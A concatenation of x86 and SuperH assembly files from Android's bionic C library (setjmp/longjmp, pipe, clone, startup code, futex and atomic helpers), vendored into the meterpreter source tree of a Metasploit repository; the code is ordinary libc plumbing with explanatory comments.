	mov.l	@r4+, r13
	mov.l	@r4+, r14
	mov.l	@r4+, r15		/* stack pointer */
	lds.l	@r4+, macl
	lds.l	@r4+, mach
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
	xor	r0, r0
	lds	r0, fpscr		/* known fpscr state for fmov.s below */
	frchg				/* other bank first (mirrors _setjmp) */
	fmov.s	@r4+, fr12
	fmov.s	@r4+, fr13
	fmov.s	@r4+, fr14
	fmov.s	@r4+, fr15
	frchg				/* back to the original bank */
	fmov.s	@r4+, fr12
	fmov.s	@r4+, fr13
	fmov.s	@r4+, fr14
	fmov.s	@r4+, fr15
	lds.l	@r4+, fpul
	lds.l	@r4+, fpscr		/* caller's fpscr restored last */
#endif
	mov	r5, r0			/* return value = val ... */
	tst	r0, r0
	bf	.L0
	add	#1, r0			/* ... but never 0: map 0 -> 1 */
.L0:
	rts				/* "return" from the _setjmp site */
	nop				/* delay slot */

	SET_ENTRY_SIZE(_longjmp)
|
OpenWireSec/metasploit | 1,953 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/pipe.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.text
.type pipe, @function
.globl pipe
.align 4
pipe:
	/*
	 * int pipe(int fds[2])   -- r4 = fds  (SuperH / Linux)
	 *
	 * The SH pipe syscall hands back the two new descriptors in
	 * r0 and r1 instead of writing them through a user pointer,
	 * so the wrapper stores them into the caller's array itself.
	 * Returns 0 on success, -1 with errno set on failure.
	 */
	/* invoke trap */
	mov.l	0f, r3		/* r3 = __NR_pipe (trap num) */
	trapa	#(0 + 0x10)	/* zero-argument syscall trap */
	/* check return value: negative r0 means -errno */
	cmp/pz	r0
	bt	setfds
	/* keep error number; jsr clobbers pr, so save it */
	sts.l	pr, @-r15
	mov.l	1f, r1
	jsr	@r1		/* __set_syscall_errno(result) -> r0 = -1 */
	mov	r0, r4		/* delay slot: pass result as argument */
	lds.l	@r15+, pr
	bra	end
	nop			/* delay slot */
setfds:
	mov.l	r0, @r4		/* fds[0] = first descriptor */
	add	#4, r4
	mov.l	r1, @r4		/* fds[1] = second descriptor */
	mov	#0, r0		/* POSIX: pipe() returns 0 on success
				 * (previously fds[0] leaked through as
				 * the return value) */
end:
	rts
	nop			/* delay slot */
	.align	2
0:	.long	__NR_pipe
1:	.long	__set_syscall_errno
|
OpenWireSec/metasploit | 2,723 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/setjmp.S | /* $OpenBSD: setjmp.S,v 1.8 2005/08/07 11:30:38 espie Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* William Jolitz.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
/*
* C library -- setjmp, longjmp
*
* longjmp(a,v)
* will generate a "return(v)" from the last call to
* setjmp(a)
* by restoring registers from the stack.
* The previous signal state is restored.
*/
ENTRY(setjmp)
	/*
	 * int setjmp(jmp_buf env)  -- env at 4(%esp)
	 * Saves the current signal mask (obtained via sigblock(0))
	 * plus the callee-saved register state.  jmp_buf layout:
	 *   0: return address   4: ebx   8: esp  12: ebp
	 *  16: esi  20: edi    24: signal mask
	 * Returns 0.
	 */
	PIC_PROLOGUE
	pushl	$0
#ifdef PIC
	call	PIC_PLT(_C_LABEL(sigblock))	/* eax = old mask */
#else
	call	_C_LABEL(sigblock)
#endif
	addl	$4,%esp
	PIC_EPILOGUE
	movl	4(%esp),%ecx		/* ecx = env */
	movl	0(%esp),%edx		/* edx = our return address */
	movl	%edx, 0(%ecx)
	movl	%ebx, 4(%ecx)
	movl	%esp, 8(%ecx)
	movl	%ebp,12(%ecx)
	movl	%esi,16(%ecx)
	movl	%edi,20(%ecx)
	movl	%eax,24(%ecx)		/* eax still holds the old mask */
	xorl	%eax,%eax		/* return 0 */
	ret
ENTRY(longjmp)
	/*
	 * void longjmp(jmp_buf env, int val)
	 * Restores the signal mask saved by setjmp (via sigsetmask),
	 * then the saved registers, and "returns" val (1 if val == 0)
	 * from the original setjmp call site.
	 */
	movl	4(%esp),%edx
	PIC_PROLOGUE
	pushl	24(%edx)		/* saved signal mask */
#ifdef PIC
	call	PIC_PLT(_C_LABEL(sigsetmask))
#else
	call	_C_LABEL(sigsetmask)
#endif
	addl	$4,%esp
	PIC_EPILOGUE
	movl	4(%esp),%edx		/* reload env (call clobbered regs) */
	movl	8(%esp),%eax		/* eax = val */
	movl	0(%edx),%ecx		/* ecx = saved return address */
	movl	4(%edx),%ebx
	movl	8(%edx),%esp		/* switch back to the saved stack */
	movl	12(%edx),%ebp
	movl	16(%edx),%esi
	movl	20(%edx),%edi
	testl	%eax,%eax		/* longjmp must never yield 0 */
	jnz	1f
	incl	%eax
1:	movl	%ecx,0(%esp)		/* plant return address, then ret */
	ret
|
OpenWireSec/metasploit | 2,949 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/crtbegin_static.S | # bionic/arch-x86/bionic/crtbegin_static.S
#
# Copyright 2006, The Android Open Source Project
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Google Inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Google Inc. ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL Google Inc. BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
.text
.align 4
.type _start, @function
.globl _start
# this is the small startup code that is first run when
# any executable that is statically-linked with Bionic
# runs.
#
# it's purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
	mov	%esp, %eax	# eax = raw ELF data block left by the kernel
	mov	$1f, %edx	# 4th arg: &structors (four arrays below)
	pushl	%edx
	mov	$0f, %edx	# 3rd arg: trampoline that jumps to main
	pushl	%edx
	mov	$0, %edx	# 2nd arg: "onexit" hook -- unused, NULL
	pushl	%edx
	pushl	%eax		# 1st arg: elfdata
	call	__libc_init	# __libc_init(elfdata, onexit, slingshot, structors)
0:	jmp	main		# entered through the slingshot pointer
1:	.long	__PREINIT_ARRAY__
	.long	__INIT_ARRAY__
	.long	__FINI_ARRAY__
	.long	__CTOR_LIST__
# each array below starts with a -1 sentinel; the terminating 0 entry
# is contributed elsewhere (crtend) -- see crtbegin_dynamic's comment.
	.section .preinit_array, "aw"
	.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
	.long -1
	.section .init_array, "aw"
	.globl __INIT_ARRAY__
__INIT_ARRAY__:
	.long -1
	.section .fini_array, "aw"
	.globl __FINI_ARRAY__
__FINI_ARRAY__:
	.long -1
	.section .ctors, "aw"
	.globl __CTOR_LIST__
__CTOR_LIST__:
	.long -1
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 1,275 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/clone.S | #include <sys/linux-syscalls.h>
.text
/*
* int __pthread_clone(int (*fn)(void*), void *tls, int flags,
* void *arg);
*/
.globl __pthread_clone
.type __pthread_clone, @function
.align 4
__pthread_clone:
	/* int __pthread_clone(int (*fn)(void*), void *tls, int flags, void *arg)
	 * After the two pushes: 12(%esp)=fn, 16=tls, 20=flags, 24=arg. */
	pushl	%ebx
	pushl	%ecx
	movl	16(%esp), %ecx		# ecx = tls = top of the child stack
	movl	20(%esp), %ebx		# ebx = flags
	# insert arguments onto the child stack:
	#   tls-12: fn   tls-8: arg   tls-4: tls
	movl	12(%esp), %eax
	movl	%eax, -12(%ecx)
	movl	24(%esp), %eax
	movl	%eax, -8(%ecx)
	lea	(%ecx), %eax		# eax = tls itself
	movl	%eax, -4(%ecx)
	movl	$__NR_clone, %eax	# clone(ebx=flags, ecx=child stack)
	int	$0x80
	test	%eax, %eax
	jns	1f
	# an error occurred, set errno and return -1
	negl	%eax
	call	__set_errno
	orl	$-1, %eax
	jmp	2f
1:
	jnz	2f			# parent: eax = child id, return it
	# we're in the child thread now, call __thread_entry
	# with the appropriate arguments on the child stack
	# we already placed most of them
	subl	$16, %esp		# esp = tls-16: fn/arg/tls now sit
	jmp	__thread_entry		#   at 4/8/12(%esp) as call-style args
	hlt				# not reached
2:
	popl	%ecx
	popl	%ebx
	ret
/* XXX: TODO: Add __bionic_clone here
* See bionic/bionic_clone.c and arch-arm/bionic/clone.S
* for more details...
*/
|
OpenWireSec/metasploit | 1,511 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/__get_sp.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.type __get_sp, @function
.global __get_sp
.align 4
__get_sp:
	/* void *__get_sp(void): hand the caller the current stack
	 * pointer value in %eax. */
	lea	(%esp), %eax		/* eax = %esp (address form of mov) */
	ret
|
OpenWireSec/metasploit | 1,294 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/_exit_with_stack_teardown.S | #include <sys/linux-syscalls.h>
.text
.type _exit_with_stack_teardown, @function
.globl _exit_with_stack_teardown
.align 4
/*
* void _exit_with_stack_teardown(void *stackBase, int stackSize, int *retCode)
*/
_exit_with_stack_teardown:
	/* Unmap the thread's own stack, then exit -- never returns. */
	/* we can trash %ebx here since this call should never return. */
	/* We can also take advantage of the fact that the linux syscall trap
	 * handler saves all the registers, so we don't need a stack to keep
	 * the retCode argument for exit while doing the munmap */
	/* TODO(dmtriyz): No one expects this code to return, so even if
	 * munmap fails, we have to exit. This should probably be fixed, but
	 * since ARM side does the same thing, leave it as is.
	 */
	mov	4(%esp), %ebx		/* stackBase */
	mov	8(%esp), %ecx		/* stackSize */
	mov	12(%esp), %edx		/* retCode, not used for munmap */
	/* NOTE(review): %edx is handed to exit() unchanged below, i.e. the
	 * third argument is used directly as the exit status; the
	 * "int *retCode" in the prototype comment above looks wrong --
	 * confirm against callers. */
	mov	$__NR_munmap, %eax
	int	$0x80			/* munmap(stackBase, stackSize);
					 * int $0x80 preserves all regs but
					 * %eax, so %edx survives */
	mov	%edx, %ebx		/* retrieve the retCode */
	movl	$__NR_exit, %eax
	int	$0x80			/* exit(retCode) */
	/* exit does not return */
	/* can't have a ret here since we no longer have a usable stack. Seems
	 * that presently, 'hlt' will cause the program to segfault.. but this
	 * should never happen :) */
	hlt
|
OpenWireSec/metasploit | 3,234 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/crtbegin_dynamic.S | # bionic/arch-x86/bionic/crtbegin_dynamic.S
#
# Copyright 2006, The Android Open Source Project
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Google Inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Google Inc. ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL Google Inc. BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
.text
.align 4
.type _start, @function
.globl _start
# this is the small startup code that is first run when
# any executable that is dynamically-linked with Bionic
# runs.
#
# it's purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
	mov	%esp, %eax	# eax = raw ELF data block left by the kernel
	mov	$1f, %edx	# 4th arg: &structors (four arrays below)
	pushl	%edx
	mov	$0f, %edx	# 3rd arg: trampoline that jumps to main
	pushl	%edx
	mov	$0, %edx	# 2nd arg: "onexit" hook -- unused, NULL
	pushl	%edx
	pushl	%eax		# 1st arg: elfdata
	call	__libc_init	# __libc_init(elfdata, onexit, slingshot, structors)
0:
	jmp	main		# entered through the slingshot pointer
1:	.long	__PREINIT_ARRAY__
	.long	__INIT_ARRAY__
	.long	__FINI_ARRAY__
	.long	__CTOR_LIST__
# the .ctors section contains a list of pointers to "constructor"
# functions that need to be called in order during C library initialization,
# just before the program is being run. This is a C++ requirement
#
# the last entry shall be 0, and is defined in crtend.S
#
	.section .preinit_array, "aw"
	.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
	.long -1		# -1 sentinel marks the head of each array
	.section .init_array, "aw"
	.globl __INIT_ARRAY__
__INIT_ARRAY__:
	.long -1
	.section .fini_array, "aw"
	.globl __FINI_ARRAY__
__FINI_ARRAY__:
	.long -1
	.section .ctors, "aw"
	.globl __CTOR_LIST__
__CTOR_LIST__:
	.long -1
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 2,422 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/_setjmp.S | /* $OpenBSD: _setjmp.S,v 1.5 2005/08/07 11:30:38 espie Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* William Jolitz.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
/*
* C library -- _setjmp, _longjmp
*
* _longjmp(a,v)
* will generate a "return(v)" from the last call to
* _setjmp(a)
* by restoring registers from the stack.
* The previous signal state is NOT restored.
*/
ENTRY(_setjmp)
	/*
	 * int _setjmp(jmp_buf env)  -- env at 4(%esp)
	 * Saves callee-saved registers only; the signal mask is NOT
	 * saved.  Layout: 0=return addr, 4=ebx, 8=esp, 12=ebp,
	 * 16=esi, 20=edi.  Returns 0.
	 */
	movl	4(%esp),%eax		/* eax = env */
	movl	0(%esp),%edx		/* edx = our return address */
	movl	%edx, 0(%eax)		/* rta */
	movl	%ebx, 4(%eax)
	movl	%esp, 8(%eax)
	movl	%ebp,12(%eax)
	movl	%esi,16(%eax)
	movl	%edi,20(%eax)
	xorl	%eax,%eax		/* return 0 */
	ret
ENTRY(_longjmp)
	/*
	 * void _longjmp(jmp_buf env, int val)
	 * Restores the registers saved by _setjmp and "returns" val
	 * (1 if val == 0) from the _setjmp call site.  The signal
	 * mask is NOT restored.
	 */
	movl	4(%esp),%edx		/* edx = env */
	movl	8(%esp),%eax		/* eax = val */
	movl	0(%edx),%ecx		/* ecx = saved return address */
	movl	4(%edx),%ebx
	movl	8(%edx),%esp		/* switch back to the saved stack */
	movl	12(%edx),%ebp
	movl	16(%edx),%esi
	movl	20(%edx),%edi
	testl	%eax,%eax		/* never yield 0 */
	jnz	1f
	incl	%eax
1:	movl	%ecx,0(%esp)		/* plant return address, then ret */
	ret
|
OpenWireSec/metasploit | 3,764 | external/source/meterpreter/source/bionic/libc/arch-x86/bionic/atomics_x86.S | #include <sys/linux-syscalls.h>
#define FUTEX_WAIT 0
#define FUTEX_WAKE 1
/*
* int __futex_wait(volatile void *ftx, int val, const struct timespec *timeout)
*/
.text
.globl __futex_wait
.type __futex_wait, @function
.align 4
__futex_wait:
	/*
	 * int __futex_wait(volatile void *ftx, int val, const struct timespec *timeout)
	 * Raw futex(ftx, FUTEX_WAIT, val, timeout) syscall.  Returns
	 * the kernel result directly (negative errno on failure --
	 * errno is NOT set).  %ebx/%esi are callee-saved, hence the
	 * push/pop; args shift by 8 after the two pushes.
	 */
	pushl	%ebx
	pushl	%esi
	mov	12(%esp), %ebx		/* ftx */
	movl	$FUTEX_WAIT, %ecx
	mov	16(%esp), %edx		/* val */
	mov	20(%esp), %esi		/* timeout */
	movl	$__NR_futex, %eax
	int	$0x80
	popl	%esi
	popl	%ebx
	ret
/* int __futex_wake(volatile void *ftx, int count) */
.text
.globl __futex_wake
.type __futex_wake, @function
.align 4
__futex_wake:
	/*
	 * int __futex_wake(volatile void *ftx, int count)
	 * Raw futex(ftx, FUTEX_WAKE, count) syscall: wake up to count
	 * waiters.  Returns the raw kernel result (number woken, or
	 * negative errno -- errno is NOT set).
	 */
	pushl	%ebx
	mov	8(%esp), %ebx		/* ftx (args shifted by the push) */
	movl	$FUTEX_WAKE, %ecx
	mov	12(%esp), %edx		/* count */
	movl	$__NR_futex, %eax
	int	$0x80
	popl	%ebx
	ret
/* int __futex_syscall3(volatile void *ftx, int op, int count) */
.text
.globl __futex_syscall3
.type __futex_syscall3, @function
.align 4
__futex_syscall3:
	/*
	 * int __futex_syscall3(volatile void *ftx, int op, int count)
	 * Generic 3-argument futex(2) wrapper: op is passed through
	 * verbatim, so any timeout-less futex operation can be issued.
	 * Returns the raw kernel result (negative errno on failure).
	 */
	pushl	%ebx
	movl	8(%esp), %ebx	/* ftx */
	movl	12(%esp), %ecx	/* op */
	movl	16(%esp), %edx	/* value */
	movl	$__NR_futex, %eax
	int	$0x80
	popl	%ebx
	ret
/* int __futex_syscall4(volatile void *ftx, int op, int val, const struct timespec *timeout) */
.text
.globl __futex_syscall4
.type __futex_syscall4, @function
.align 4
__futex_syscall4:
	/*
	 * int __futex_syscall4(volatile void *ftx, int op, int val,
	 *                      const struct timespec *timeout)
	 * Generic 4-argument futex(2) wrapper (op passed through).
	 * Returns the raw kernel result (negative errno on failure).
	 */
	pushl	%ebx
	pushl	%esi
	movl	12(%esp), %ebx		/* ftx */
	movl	16(%esp), %ecx		/* op */
	movl	20(%esp), %edx		/* val */
	movl	24(%esp), %esi		/* timeout */
	movl	$__NR_futex, %eax
	int	$0x80
	popl	%esi
	popl	%ebx
	ret
/* int __atomic_cmpxchg(int old, int new, volatile int* addr) */
.text
.globl __atomic_cmpxchg
.type __atomic_cmpxchg, @function
.align 4
__atomic_cmpxchg:
	/*
	 * int __atomic_cmpxchg(int old, int new, volatile int *addr)
	 * Atomically: if (*addr == old) { *addr = new; return 0; }
	 * else return 1.  Note the inverted sense: 0 == success.
	 */
	mov	4(%esp), %eax		/* old (cmpxchg compares vs %eax) */
	mov	8(%esp), %ecx		/* new */
	mov	12(%esp), %edx		/* addr */
	lock cmpxchg %ecx, (%edx)
	jnz	1f			/* ZF clear -> compare failed */
	xor	%eax, %eax
	jmp	2f
1:
	movl	$1, %eax
2:
	ret			/* 0 == success, 1 == failure */
/* int __atomic_swap(int new, volatile int* addr) */
.text
.globl __atomic_swap
.type __atomic_swap, @function
.align 4
__atomic_swap:
	/*
	 * int __atomic_swap(int new, volatile int *addr)
	 * Atomically stores new into *addr and returns the previous
	 * value.  xchg with a memory operand is implicitly locked, so
	 * no lock prefix is required.
	 */
	mov	8(%esp), %edx		/* edx = addr */
	mov	4(%esp), %eax		/* eax = new value */
	xchg	%eax, (%edx)		/* atomic swap; eax <- old *addr */
	ret
/*
* int __atomic_dec(volatile int* addr)
*
* My x86 asm is really rusty.. this is probably suboptimal
*/
.text
.globl __atomic_dec
.type __atomic_dec, @function
.align 4
__atomic_dec:
	/*
	 * int __atomic_dec(volatile int *addr)
	 * Atomically decrements *addr through a cmpxchg retry loop and
	 * returns the PREVIOUS value.
	 */
	pushl	%ebx
	pushl	%esi
	movl	12(%esp), %ebx		/* addr (shifted by the two pushes) */
1:
	movl	(%ebx), %esi		/* old = *addr */
	movl	%esi, %edx
	subl	$1, %edx		/* new = old - 1 */
	pushl	%ebx
	pushl	%edx
	pushl	%esi
	call	__atomic_cmpxchg	/* publish: returns 0 on success */
	addl	$12, %esp
	test	%eax, %eax
	jnz	1b			/* lost a race with another writer: retry */
	movl	%esi, %eax		/* return old */
	popl	%esi
	popl	%ebx
	ret
.text
/* int __atomic_inc(volatile int* addr) */
.globl __atomic_inc
.type __atomic_inc, @function
.align 4
__atomic_inc:
	/*
	 * int __atomic_inc(volatile int *addr)
	 * Atomically increments *addr through a cmpxchg retry loop and
	 * returns the PREVIOUS value (mirror image of __atomic_dec).
	 */
	pushl	%ebx
	pushl	%esi
	movl	12(%esp), %ebx		/* addr (shifted by the two pushes) */
1:
	movl	(%ebx), %esi		/* old = *addr */
	movl	%esi, %edx
	addl	$1, %edx		/* new = old + 1 */
	pushl	%ebx
	pushl	%edx
	pushl	%esi
	call	__atomic_cmpxchg	/* publish: returns 0 on success */
	addl	$12, %esp
	test	%eax, %eax
	jnz	1b			/* lost a race with another writer: retry */
	movl	%esi, %eax		/* return old */
	popl	%esi
	popl	%ebx
	ret
|
OpenWireSec/metasploit | 1,709 | external/source/meterpreter/source/bionic/libc/arch-x86/string/memcpy_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
 * memcpy dispatcher: selects an implementation at build time.
 * With USE_SSSE3, the SSSE3-optimized copy routine (ssse3-memcpy5.S) is
 * assembled under the public name "memcpy"; USE_AS_MEMMOVE requests the
 * overlap-safe (memmove-style) code paths from that implementation
 * - TODO confirm against ssse3-memcpy5.S.  Without USE_SSSE3 the generic
